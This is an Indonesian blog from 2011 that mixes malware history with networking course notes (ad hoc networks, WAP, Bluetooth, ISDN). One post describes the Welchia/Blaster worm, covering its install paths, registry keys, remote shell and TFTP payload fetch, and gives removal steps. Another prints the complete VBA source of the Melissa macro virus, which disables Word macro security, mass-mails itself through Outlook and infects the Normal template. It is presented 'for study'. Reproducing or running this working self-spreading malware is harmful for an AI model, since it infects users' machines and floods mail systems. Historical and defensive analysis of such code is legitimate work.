Senin, 17 Oktober 2011

blaster worm

Tipe:  Worm
Panjang infeksi : 10,240 bytes
Systems yang dapat di infeksi:Microsoft IIS, Windows 2000, Windows XP
Systems yang tidak terinfeksi:Linux, Macintosh, OS/2, UNIX, Windows 3.x,
Windows 95, Windows 98, Windows Me, Windows NT

Port yang digunakan: TCP 135(RPC DCOM), TCP 80(WebDav)

saat W32.Welchia.Worm di eksekusi, maka akan melakukan:

mengkopikan dirinya ke:
%System%\Wins\Dllhost.exe
catatan %Sytem% adalah variabel, worm akan mencari folder file system dan
mengkopikan dirinya,secara default adalah C:\Winnt\System32 (Windows 2000)
atau

C:\Windows\System32 (Windows XP).membuat kopi file
%System%\Dllcache\Tftpd.exe sebagai %System%\Wins\svchost.exe.

catatan:Tftpd adalah program yang diijinkan, sehingga sulit untuk dideteksi
oleh antivirus.

menambah subkeys:
RpcPatch

dan:

RpcTftpd

ke registry key di:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services


Membuat beberapa services:

Nama Service : RpcTftpd
Service Display Name: Network Connections Sharing
Service Binary: %System%\wins\svchost.exe

Service ini akan diset untuk berjalan secara manual.

Nama Service : RpcPatch
Service Display Name: WINS Client
Service Binary: %System%\wins\dllhost.exe

Service ini akan di set untuk dapat berjalan secara otomatis.
Proses terakhir adalah menghapus file %System%\msblast.exe sebagai tempat
pertama kali W32.Blaster.Worm


worm ini melakukan:
- mengirimkan packet ICMP /ping , untuk mengecek apakah komputer denga ip
tersebut aktif di jaringan.
- Setelah worm berhasil mengetahui bahwa mesin tersebut aktif di jaringan
maka akan mengirimkan data ke port tcp 135 dan akan mengeksploitasi
kelemahan DCOM RPC
atau,
akan mengirim date ke port tcp 80 untuk mengeksploitasi kelemahan Webdav
- membuat shell untuk remote pada mesin yang telah di ekspoitasi
kelemahannya dan akan mencoba terhubung ke mesin penyerang dengan
menggunakan prot tcp secara acak, antara 666 dan 765 untuk menerima
instruksi.
- Menjalankan server TFTP pada mesin penyerang dan menginstruksikan mesin
yang tereksploitasi (korban) untuk terhubung dan mendownload Dllhost.exe
dan Svchost.exe dari mesin penyerang. jika file
%System%\dllcache\tftpd.exe ada, maka worm tidak akan mendownload
svchost.exe.
- memeriksa versi Sistem operasi komputer tersebut, Nomor Service pack
dan juga menghalangi untuk terhubung ke Microsoft's Windows Update dan
mencegah komputer untuk DCOM RPC vulnerability patch.

Untuk memusnahkan worm ini dapat dilakukan beberapa cara:
+ Gunakan peralatan removal W32.Welchia.WOrm
+ Menghapus secara manual:
1 menDisable System Restore (Windows XP).
mengapa? XP kuhusnya secara default mengenable system restore,
mengapa berbahaya? karena virus, worm atau trojan yang menginfeksi
komputer anda mungkin saja di backup juga oleh system restore dan yang
membuat lebih berbahaya adalah windows melindungi program lain,termasuk
antivirus untuk memodifikasi (menquarantine, menghapus dan membersihkan)
sytem restore=system restore bisa jadi tempat teraman bagi virus dkk.
karena itu anda wajib men-disablekan system restore anda

untuk mematikan system restore:
- anda harus sebagaoi administrator (xp)
- masuk ke control panel
- pilih system, di system properties pilih System restore
- centang turn off system restore


2 Update virus definition dari antivirus yang digunakan. anda hanya perlu
mengunjungi situs antivirus anda, atau menjalankan Live Update langsung
dari program antivirus anda untuk melaukan update.

3 Restart komputer anda dalam save mode untuk menghentikan Worm.
untuk windows 95/98/me anda bisa masuk ke save mode setelah restart
sedangkan,
untuk xp/nt/win 2000
anda dapat menghentikan kerja virus buat sementara dengan cara:
-masuk control panel
-pilih services pada administrative tools
-scroll kebawah sampai anda temukan
+ Network Connections Sharing
+ WINS Client
-klik-kanan dan pilih stop

4 jalankan full system scan dan delete semua file yang dideteksi sebagai
W32.Welchia.Worm.jalankan full scan dan konfigurasi terlebih dahulu
antivirus anda jika ditemukan ada file yang terinfeksi W32.Welchia.Worm
maka hapus file tersebut

5 Delete values& subkeys yang dibuat oleh virus di registry.
hal ini sedikit beresiko, sebelum anda lakukan, backup dulu registry anda

-klik start -run dan ketik regedit
masuk ke key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

hapus subkey berikut:

RpcPatch

dan

RpcTftpd
simpan perubahan dan keluar dari registry

6 Delete Svchost.exe file.
masuk ke folder %system%wins dan hapus semua file svchost.exe

sumber : http://ezine.echo.or.id/ezine1/w32.welchia.worm.txt

virus Code Red & Code Red II

Muncul musim panas 2001, menyerang OS Windows 2000 & NT. Virusnya bakal membuat buffer penuh sehingga menghabiskan memori. Paling seru waktu berhubungan sama White House, semua komputer yang kena virus ini bakalan otomatis akses ke web server di White House secara bersamaan, jadi bikin overload, alias serangan DDoS. Akhirnya Microsoft rilis patchnya saat itu.

sumber http://wahw33d.blogspot.com/2010/06/10-virus-komputer-paling-kejam-di-dunia.html#ixzz0q093cBqA

source code virus Mellisa - 1999

Melissa virus yang dibuat pada tahun 1999 oleh David L. Smith, dibuat
dengan program dasar, persis dengan macro Microsoft Word. Virus Melissa
adalah massa-mail malware yang dikatakan telah terinfeksi sampai 20
persen dari komputer di seluruh dunia. Virus ini menyebar melalui email.
Ketika file ini akan dibuka atau diklik maka secara otomatis akan
menjalankan replikasi virus dan secara otomatis mengirim ke 50 alamat
email. Email server di seluruh dunia terpaksa ditutup untuk mencegah
virus menyebar, serta untuk menghapus virus dari system.Smith
dipenjarakan 20 bulan dan didenda $ 5.000 dan dilarang untuk mengakses
komputer tanpa pengawasan.

Disini kita membedah source code virus melisa, semoga kita bisa belajar dari sini agar nantinya kita bisa mengerti dan mampu belajar.
Serta dapat menambah pengetahuan kita dalam mempelajari virus.
dibawah ini kita mempelajari source code virus Mellisa.

Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub



Morris Worm -1988


2 November 1988, Morris Worm, salah satu worm virus pertama yang fenomenal, didistribusikan melalui internet oleh seorang mahasiswa Cornell University, Robert Tappan Morris. Meskipun Morris berasal dari Cornell, namun ia sengaja melepaskan virus tersebut dari MIT untuk menyamarkan kenyataan bahwa worm tersebut berasal dari Cornell.
Morris sebenarnya menulis worm tersebut hanya untuk menguji populasi internet saat itu dan bukan berniat untuk merusak. Namun, worm yang dibuat ternyata beraksi lebih hebat dan berubah dari uji intelektual menjadi mesin denial of service. Morris worm mereplikasi ulang di setiap mesin yang ditemui jauh lebih cepat dari yang bisa diantisipasi.

Worm ini menerobos masuk melalui lubang di debug mode milik sendmail Unix yang berjalan dalam sistem dan menunggu sistem lain terkoneksi lalu mengirimkan email. Para ahli di University of California, Berkeley dan MIT mendapatkan salinan dari program dan mencoba untuk membuka source code Morris worm untuk menganalisa cara kerjanya.

Tim programmer bekerja non stop dan menghasilkan setidaknya bagaimana melakukan perbaikan temporer, yaitu cara untuk mencegah penyebaran worm yang terus menerus. Setalah hampir 12 jam, tim di Berkeley menemukan solusi mengatasi penyebaran worm. Metode lain juga ditemukan di Purdue dan disebarkan. Namun informasi tersebut tidak dapat keluar dengan cepat karena pada kenyataannya sudah banyak situs yang memutus koneksinya ke internet karena khawatir terserang Morris worm.

Beberapa hari kemudian, keadaan berangsur-angsur normal kembali dan Morris disebut-sebut dalam New York Times sebagai penulis dari worm yang menggemparkan ini. Tercatat sekitar 6000 mesin UNIX yang terkoneksi dengan internet, sekitar 10% dari populasi internet lumpuh. Kerugian sebesar US$15 juta. Worm Morris memacu pemerintah untuk mendirikan CERT (Computer Emergency Response Team). Morris adalah hacker pertama yang dikenai hukum cyber di Amerika Serikat, Computer Fraud and Abuse Act dan dikenai hukuman 3 tahun masa percobaan, 400 jam community service, dan denda US$10.050 serta biaya pengawasannya. Saat ini, dirinya menjadi pengajar Ilmu Komputer di MIT.

sumber :
http://groups.csail.mit.edu/mac/classes/6.805/articles/morris-worm.html
http://en.wikipedia.org/wiki/Morris_worm

Senin, 03 Oktober 2011

AD HOC NETWORK

jaringan ad hoc adalah jaringan bersifat sementara tanpa bergantung pada infrastruktur yang ada dan bersifat independen.
Ad Hoc Network adalah jaringan wireless yang terdiri dari kumpulan mobile node (mobile station) yang bersifat dinamik dan spontan, dapat diaplikasikan di mana pun tanpa menggunakan jaringan infrastruktur (seluler ataupun PSTN) yang telah ada. Contoh mobile node adalah notebook, PDA dan ponsel. Jaringan ad hoc disebut juga dengan spontaneous networkatau disebut MANET (Mobile Ad hoc NETwork).

karakteristik Jaringan Ad Hoc


Node-node pada jaringan Ad Hoc tidak hanya berperan sebagai pengirim dan penerima data, namun dapat berperan sebagai penunjang node yang lainnya, misalnya mempunyai kemampuan layaknya router. Dengan demikian diperlukan adanya routing protokol dalam jaringan Ad Hoc untuk menunjang proses kirim terima antar node-nodenya. Berikut beberapa karakteristik jaringan Ad Hoc :

a. Multiple wireless link : setiap node yang mempunyai sifat mobility dapat memiliki beberapa interface yang terhubung ke beberapa node lainnya.

b. Dynamic topology : dikarenakan sifat node yang mobile, maka topologi jaringannya dapat berubah secara random/acak. Sebagai akibatnya routing protocol mempunyai masalah yang lebih kompleks dibandingkan dengan jaringan wired dengan node yang tetap.

c. Limited resources : seperti jaringan wireless lainnya, jaringan Ad Hoc dibatasi oleh masalah daya dan kapasitas memori.

Contoh Penggunaan/Aplikasi di lapangan :
  1. Operasi militer, seperti yang telah diujicobakan kawasan pertempuran di Sudan. Dengan jaringan ad hoc, mempermudah untuk akses informasi antar personil militer.
  2. Komersial, jaringan ad hoc dapat digunakan pada situasi emergency atau upaya penyelamatan (rescue operation), seperti banjir atau gempa bumi dan entertainment seperti acara live music.
  3. jaringan yang cepat tersedia dengan menggunakan notebook untuk menyebarkan dan berbagi informasi di antara user seperti dalam konferensi atau ruang kuliah.
  4. Personal Area Network, untuk jarak pendek (short distance) lebih kurang 10 m, Ad hoc Network secara mudah berkomunikasi antar bermacam peralatan (seperti PDA, laptop dan telepon seluler) dengan laju data yang rendah.
Keuntungan :
  1. Tidak memerlukan dukungan backbone infrastruktur sehingga mudah diimplementasikan dan sangat berguna ketika infrastruktur tidak ada ataupun tidak berfungsi lagi.
  2. Mobile node yang selalu bergerak (mobility) dapat mengakses informasi secara real time ketika berhubungan dengan mobile node lain, sehingga pertukaran data dan pengambilan keputusan dapat segera dilaksanakan.
  3. fleksibel terhadap suatu keperluan tertentu karena jaringan ini memang bersifat sementara.
  4. Dapat direkonfigurasi dalam beragam topologi baik untuk jumlah user kecil hingga banyak sesuai dengan aplikasi dan instalasi (scalability).
Kerugian :
  1. packet loss (rugi-rugi paket) akan terjadi bila transmisi mengalami kesalahan (error).
  2. seringkali terjadi disconnection, karena tidak selalu berada dalam area cakupan.
  3. bandwidth komunikasi yang terbatas
  4. lifetime baterai yang singkat.
  5. kapasitas kemampuan jangkauan mobile node yang terbatas dan bervariasi.
Konfigurasi sederhana :
  1. Dibutuhkan “wireless network card” pada masing-masing komputer.
  2. Masuk ke “wireless network card properties” dan set “SSID” dengan nama tertentu (unique).
  3. Set IP LAN static pada komputer. Patikan kita mengkonfigurasi IP komputer tersebut dalam satu subnet dan range yang sama.
  4. Set “network card” pada mode “ad-hoc”, bukan “infrastructure”.
  5. Satu sebagai host (access point) yang lain sebagai client. Atau semua bisa berperan sebagai host (multihost)

Infrastruktur Netrwork


Suatu infrastruktur jaringan adalah sekumpulan komponen-2 fisikal dan logical yang memberikan pondasi konektifitas, keamanan, routing, manajemen, access, dan berbagai macam fitur integral jaringan. Misalkan jika jaringan kita terhubung Internet, maka kita akan lebih banyak memakai protocol TCP/IP suite yang merupakan protocol paling banyak dipakai pada jaringan.

Infrastruktur Fisik
Suatu infrastruktur fisik, sesuai dengan namanya – fisik, maka akan banyak berhubungan dengan komponen fisik suatu jaringan (tentunya sesuai dengan design jaringan yang anda buat) seperti:
  • Yang berhubungan dengan masalah perkabelan jaringan, yaitu kabel jaringan yang sesuai dengan topology jaringan yang anda pakai. Misal jika dalam jaringan anda memakai backbone Gigabit Ethernet maka sudah seharusnya anda memakai kabel CAT5e yang bisa mendukung speed Gigabit.
    • router yang memungkinkan komunikasi antar jaringan local yang berbeda segmen,
    • switches, bridges, yang memungkinkan hosts terhubung ke jaringan
    • Servers yang meliputi seperti server data file, Exchange server, DHCP server untuk layanan IP address, DNS server dan lain-2, dan juga hosts .
  • Infrastruktur fisik bisa termasuk didalamnya technology Ethernet dan standard wireless 802.11a/b/g/n, jaringan telpon umum (PSTN), Asynchronous Transfer Mode (ATM), dan semua metoda komunikasi dan jaringan fisik nya.
Infrastruktur Logical
Infrastrucktur logical dari suatu jaringan komputer bisa merupakan komposisi dari banyak elemen-2 software yang menghubungkan, memanage, dan mengamankan hosts pada jaringan. Infrastruktur logical ini memungkinkan terjadinya komunikasi antar komputer melewati jaringan fisik yang sesuai dengan topology jaringan. Sebagai contoh dari infrastruktur logical ini adalah komponen-2 seperti
  • Domain Name System (DNS), yang merupakan system untuk memberikan resolusi name dari permintaan resolusi name dari clients.
  • Directory services, yang merupakan layanan directory untuk meng-authentikasi dan authorisasi user untuk masuk dan menggunakan resources jaringan.
  • protocol-2 jaringan seperti protocol TCP/IP, protocol jaringan yang sangat popular dan paling banyak dipakai sebagai protocol jaringan dari berbagai platform jaringan baik berplatform windows, Linux, Unix dan lainnya.
  • System keamanan jaringan seperti:
    • jika anda memakai jaringan Windows server, anda mestinya sudah melengkapi dengan system update patch yang dideploy secara automatis kepada semua host dalam jaringan anda seperti WSUS (Windows System Update Services)
    • System keamanan terhadap virus, kalau untuk kepentingan jaringan yang besar anda sudah seharusnya membangun suatu system antivirus corporate edition dimana semua clients akan terhubung ke server ini untuk download signature datanya secara automatis.
    • System keamanan terhadap segala macam ancaman terhadap jaringan anda yang juga terkait dengan infrastruktur fisik anda seperti firewall, pemakaian IPSec pada koneksi remote VPN dan lainnya.
    • Segala macam policy dan guidelines dari corporate tentang pemakaian resource jaringan juga tidak kalah pentingnya. Misal policy tentang pemakaian email dalam company yang tidak (mengurangi) untuk pemakaian pribadi seperti mailing list yang bisa memungkinkan banyak email spam dalam system exchange anda.
  • software client penghubung ke server, dan lain-2.
Setelah terbentuknya jaringan infrastruktur logical ini anda sebagai administrator perlu mempunyai pengetahuan untuk bisa memahami segala aspek technology yang terlibat didalamnya. Seperti anda harus bisa membuat design IP address untuk bisa dimplementasikan berdasarkan jaringan fisik yang ada, bagaimana anda akan memberikan IP address sebagai identitas masing-2 host pada jaringan, dan juga harus bisa melakukan troubleshooting kalau terjadi permasalahan jaringan yang berhubungan dengan konektivitas, addressing, access, security maupun masalah name resolution.
Dan yang lebih penting juga adalah masalah planning anda dalam menghadapi suatu disaster – suatu bencana dalam jaringan anda. Bagaimana anda menyiapkan terjadinya suatu disaster, dan bagaimana anda akan melakukan restorasi kalau disaster itu benar-2 terjadi dan menyebabkan system anda ambruk. Untuk itu anda harus bisa mengantisipasi sejak dini dengan suatu perencanaan terhadap disaster.

Wireless Application Protocol


WAP adalah sebuah protokol atau sebuah teknik messaging service yang memungkinkan sebuah telepon genggam digital atau terminal mobile yang mempunyai fasilitas WAP, melihat/membaca isi sebuah situs di internet dalam sebuah format teks khusus. Situs internet ini harus merupakan situs dengan fasilitas WAP. WAP dipublikasikan oleh WAP Forum, ditemukan pertama kali oleh Ericsson pada tahun 1997. Motorola, Nokia, dan Unwired Planet juga melakukan hal yang sama. Anggota Forum itu kini beranggotakan lebih dari 90% pasar telepon genggam, software developer dan organisasi yang lain.

Versi

Ada beberapa versi WAP antara lain WAP 1.2.1 dan 2.0. WAP 1.2.1 hanya dapat menampilkan laman sederhana saja dibandingkan dengan WAP 2.0 yang mendukung bahasa xhtml dan gambar. WAP di buat pertama kali sebagai protokol komunikasi bergerak yang tidak bergantung pada sistem tertentu. WAP dirancang sebagai bagian dari sistem di masa depan sama halnya dengan Bluetooth dan GPRS. WAP merupakan protokol komunikasi bergerak yang terdiri dari beberapa layer dan dapat dijalankan pada sistem jaringan yang berbeda. Teknologi ini merupakan hasil kerjasama antar industri untuk membuat sebuah standar yang terbuka dan berbasis pada standar Internet, serta beberapa protokol yang sudah dioptimasi untuk lingkungan nirkabel. Teknologi ini bekerja dalam modus teks dengan kecepatan sekitar 9,6 kbps.

Keterbatasan Perangkat WAP

  1. Kemampuan Central Processing Unit (CPU) yang lebih rendah dibandingkan CPU yang digunakan pada perangkat wired seperti komputer.
  2. Keterbatasan ukuran memori
  3. Penghematan penggunaan daya (power) yang biasanya menggunakan batere
  4. Ukuran display yang lebih kecil dan terbatas
  5. Input device yang berbeda dengan device biasa

Disain dari informasi yang dikirimkan melalui WAP biasanya menggunakan format WML (Wireless Markup Language). WML ini mirip HTML, hanya lebih spesifik untuk perangkat nirkabel yang memiliki keterbatasan seperti di atas.

Contoh Penggunaan WAP

  • Informasi jadwal keberangkatan penerbangan
  • Transaksi pembelian tiket
  • Pendaftaran keberangkatan pesawat
  • Informasi lalu lintas
  • Daftar informasi kondisi cuaca
  • Informasi nilai stok
  • Mencari informasi nomor telepon atau alamat

Bluetooth

Bluetooth adalah spesifikasi industri untuk jaringan kawasan pribadi (personal area networks atau PAN) tanpa kabel. Bluetooth menghubungkan dan dapat dipakai untuk melakukan tukar-menukar informasi di antara peralatan-peralatan. Spesifiksi dari peralatan Bluetooth ini dikembangkan dan didistribusikan oleh kelompok Bluetooth Special Interest Group. Bluetooth beroperasi dalam pita frekuensi 2,4 Ghz dengan menggunakan sebuah frequency hopping traceiver yang mampu menyediakan layanan komunikasi data dan suara secara real time antara host-host bluetooth dengan jarak terbatas.Kelemahan teknologi ini adalah jangkauannya yang pendek dan kemampuan transfer data yang rendah.

Sistem Operasi

Berupa radio transceiver, baseband link controller dan link manager. Berikut beberapa karaketristik radio bluetooth sesuai dengan dokumen Bluetooth SIG dalam tabel 1

Parameter

Spesifikasi

Transmiter

Frekuensi

ISM band, 2400 - 2483.5 MHz (mayoritas), untuk beberapa negara mempunyai batasan frekuensi sendiri (lihat tabel 2), spasi kanal 1 MHz.

Maksimum Output Power

Power class 1 : 100 mW (20 dBm)Power class 2 : 2.5 mW (4 dBm)Power class 3 : 1 mW (0 dBm)

Modulasi

GFSK (Gaussian Frequency Shift Keying), Bandwidth Time : 0,5; Modulation Index : 0.28 sampai dengan 0.35.

Out of band Spurious Emission

30 MHz - 1 GHz : -36 dBm (operation mode), -57 dBm (idle mode)1 GHz – 12.75 GHz: -30 dBm (operation mode), -47 dBm (idle mode)1.8 GHz – 1.9 GHz: -47 dBm (operation mode), -47 dBm (idle mode)5.15 GHz –5.3 GHz: -47 dBm (operation mode), -47 dBm (idle mode)

Receiver

Actual Sensitivity Level

-70 dBm pada BER 0,1%.

Spurious Emission

30 MHz - 1 GHz : -57 dBm1 GHz – 12.75 GHz : -47 dBm

Max. usable level

-20 dBm, BER : 0,1%

Time Slot

Kanal dibagi dalam time slot-time slot, masing-masing mempunyai panjang 625 ms. Time slot-time slot tersebut dinomori sesuai dengan clock bluetooth dari master piconet. Batas penomoran slot dari 0 sampai dengan 227-1 dengan panjang siklus 227. Di dalam time slot, master dan slave dapat mentransmisikan paket-paket dengan menggunakan skema TDD (Time-Division Duplex). Master hanya memulai melakukan pentransmisiannya pada nomor time slot genap saja sedangkan slave hanya memulai melakukan pentransmisiannya pada nomor time slot ganjil saja.

Protokol

Maksud dari protokol adalah untuk mempercepat pengembangan aplikasi-aplikasi dengan menggunakan teknologi Bluetooth. Layer-layer bawah pada stack protokol bluetooth dirancang untuk menyediakan suatu dasar yang fleksibel untuk pengembangan protokol yang lebih lanjut. Protokol-protokol yang lain seperti RFCOMM diambil dari protokol-protokol yang sudah ada dan protokol ini hanya dimodifikasi sedikit untuk disesuaikan dengan kepentingan bluetooth. Stack protokol bluetooth dapat dibagi ke dalam empat layer sesuai dengan tujuannya.

Protocol Layer

Protocol In The Stack

Bluetooth Core Protocols, Baseband, LMP, L2CAP, SDP

Cable Replacement Protocol, RFCOMM

Cable Replacement Protocol

RFCOMM

Telephony Control Protocols

TCS Binary, AT-commands

Adopted Protocols

PPP, UDP/TCP/IP, OBEX, WAP, vCard, vCal, IrMC, WAE

Pengukuran

Ada tiga aspek dalam melakukan pengukuran Bluetooth: pengukuran RF (Radio Frequency), protokol dan profile. Pengukuran radio dilakukan untuk menyediakan compatibility perangkat radio yang digunakan di dalam sistem dan untuk menentukan kualitas sistem serta dapat menggunakan perangkat alat ukur RF standar seperti spectrum analyzer, transmitter analyzer, power meter, digital signal generator dan bit-error-rate tester (BERT). Hasil pengukuran harus sesuai dengan spesifikasi dan memenuhi parameter yang tercantum dalam Tabel 1.

Dari informasi Test & Measurement World, untuk pengukuran protokol, dapat menggunakan protocol sniffer yang dapat memonitor dan menampilkan pergerakan data antar perangkat bluetooth. Pengukuran profile dilakukan untuk meyakinkan interoperability antar perangkat dari berbagai macam vendor.

Fitur Keamanan

Bluetooth dirancang untuk memiliki fitur-fitur keamanan sehingga dapat digunakan secara aman baik dalam lingkungan bisnis maupun rumah tangga. Fitur-fitur yang disediakan bluetooth antara lain sebagai berikut:

  • Enkripsi data.
  • Autentikasi user
  • Fast frekuensi-hopping (1600 hops/sec)
  • Output power control

Fitur-fitur tersebut menyediakan fungsi-fungsi keamanan dari tingkat keamanan layer fisik/ radio yaitu gangguan dari penyadapan sampai dengan tingkat keamanan layer yang lebih tinggi seperti password dan PIN. Tetapi dari sebuah artikel Internet, menurut penelitian dua mahasiswa Tel Aviv University, mengenai adanya kemungkinan Bluetooth bisa disadap dengan proses pairing berpasangan.

Caranya adalah dengan menyiapkan sebuah kunci rahasia pada proses pairing. Selama ini dua perangkat bluetooth menyiapkan kunci digital 128 bit. Ini adalah kunci rahasia yang kemudian disimpan dan dipakai dalam proses enkripsi pada komunikasi selanjutnya. Langkah pertama ini mengharuskan pengguna yang sah untuk menginputkan kunci rahasia yang sesuai, PIN empat digit ke perangkat. Pesan lalu dikirim ke perangkat lainnya, dan ketika ditanyai kunci rahasia, dia berpura-pura lupa. Hal ini memacu perangkat lain untuk memutus kunci dan keduanya lalu mulai proses pairing baru. Kesempatan ini kemudian bisa dimanfaatkan oleh hacker untuk mengetahui kunci rahasia yang baru. Selain mengirim ini ke perangkat Bluetooth yang dituju, semua perangkat Bluetooth yang ada dalam jangkauan itu juga tetap dapat disadap.

Aplikasi dan Layanan

Protokol bluetooth menggunakan sebuah kombinasi antara circuit switching dan packet switching. Bluetooth dapat mendukung sebuah kanal data asinkron, tiga kanal suara sinkron simultan atau sebuah kanal dimana secara bersamaan mendukung layanan data asinkron dan suara sinkron. Setiap kanal suara mendukung sebuah kanal suara sinkron 64 kb/s. Kanal asinkron dapat mendukung kecepatan maksimal 723,2 kb/s asimetris, dimana untuk arah sebaliknya dapat mendukung sampai dengan kecepatan 57,6 kb/s. Sedangkan untuk mode simetris dapat mendukung sampai dengan kecepatan 433,9 kb/s.

Range yang dapat dijangkau oleh Bluetooth adalah 10 meter atau 30 feet. Sistem Bluetooth juga menyediakan layanan komunikasi point to point maupun komunikasi point to multipoint. Produk bluetooth dapat berupa PC card atau USB adapter yang dimasukkan ke dalam perangkat. Sedangkan perangkat yang dapat dikombinasikan dengan Bluetooth diantaranya: handphone, kamera, personal computer (PC), printer, headset, Personal Digital Assistant (PDA), dan lainnya. Aplikasi-aplikasi yang dapat disediakan oleh layanan bluetooth ini antara lain : PC to PC file transfer, PC to PC file synch ( notebook to desktop), PC to mobile phone, PC to PDA, wireless headset, LAN connection via ethernet access point dan sebagainya.

Kelebihan yang dimiliki oleh sistem Bluetooth adalah:

  • Bluetooth dapat menembus dinding, kotak, dan berbagai rintangan lain walaupun jarak transmisinya hanya sekitar 30 kaki atau 10 meter
  • Bluetooth tidak memerlukan kabel ataupun kawat
  • Bluetooth dapat mensinkronisasi basis data dari telepon genggam ke komputer
  • Dapat digunakan sebagai perantara modem

Kekurangan dari sistem Bluetooth adalah:

  • Sistem ini menggunakan frekuensi yang sama dengan gelombang LAN standar
  • Apabila dalam suatu ruangan terlalu banyak koneksi Bluetooth yang digunakan, akan menyulitkan pengguna untuk menemukan penerima yang diharapkan
  • Banyak mekanisme keamanan Bluetooth yang harus diperhatikan untuk mencegah kegagalan pengiriman atau penerimaan informasi.
  • Di Indonesia, sudah banyak beredar virus-virus yang disebarkan melalui bluetooth dari handphone

Minggu, 02 Oktober 2011

Integrated Services Digital Network



1. DEFINISI
ISDN (Integrated Services Digital Network) adalah suatu sistem telekomunikasi di mana layanan antara data, suara, dan gambar diintegrasikan ke dalam suatu jaringan, yang menyediakan konektivitas digital ujung ke ujung untuk menunjang suatu ruang lingkup pelayanan yang luas. Para pemakai ISDN diberikan keuntungan berupa fleksibilitas dan penghematan biaya, karena biaya untuk sistem yang terintegrasi ini akan jauh lebih murah apabila menggunakan sistem yang terpisah.

Para pemakai juga memiliki akses standar melalui satu set interface pemakai jaringan multiguna standar. ISDN merupakan sebuah bentuk evolusi telepon local loop yang memepertimbangkan jaringan telepon sebagai jaringan terbesar di dunia telekomunikasi.

Di dalam ISDN terdapat dua jenis pelayanan, yaitu:

1. Basic Rate Inteface (BRI)
2. Primary Rate Interface (PRI)

2. LATAR BELAKANG
ISDN muncul menjadi sebuah sarana telekomunikasi di tengah masyarakat akibat adanya pertumbuhan permintaan dalam hal komunikasi suara, data, dan gambar, namun dengan biaya yang rendah dan fleksibilitas yang tinggi. Disamping itu, perkembangan perangkat terminal CTE memberikan kebebasan kepada pelanggan dalam memilih alat komunikasi yang berstandarkan ISDN.

3. KEUNTUNGAN
1. ISDN menawarkan kecepatan dan kualitas tinggi dalam pengiriman data, bahkan 10 kali lebih cepat disbanding PSTN
2. Efisien. Delam satu saluran saja dapat mengirim berbagai jenis layanan (gambar, suara, video) sehingga efisien dalam pemanfaatan waktu
3. Fleksibel. Single interface untuk terminal bervariasi
4. Hemat biaya. Hanya membutuhan satu terminal tunggal untuk audio dan video

4. MODEL JARINGAN
1. Model Konvensional.
Pada masa ini, masing-masing sistem jaringan terpisah, sehingga pengguna akan mengakses ke masing-masing jaringan untuk tiap keperluan layanan yang berbeda satu dengan yang lainnya.
2. Model awal ISDN.
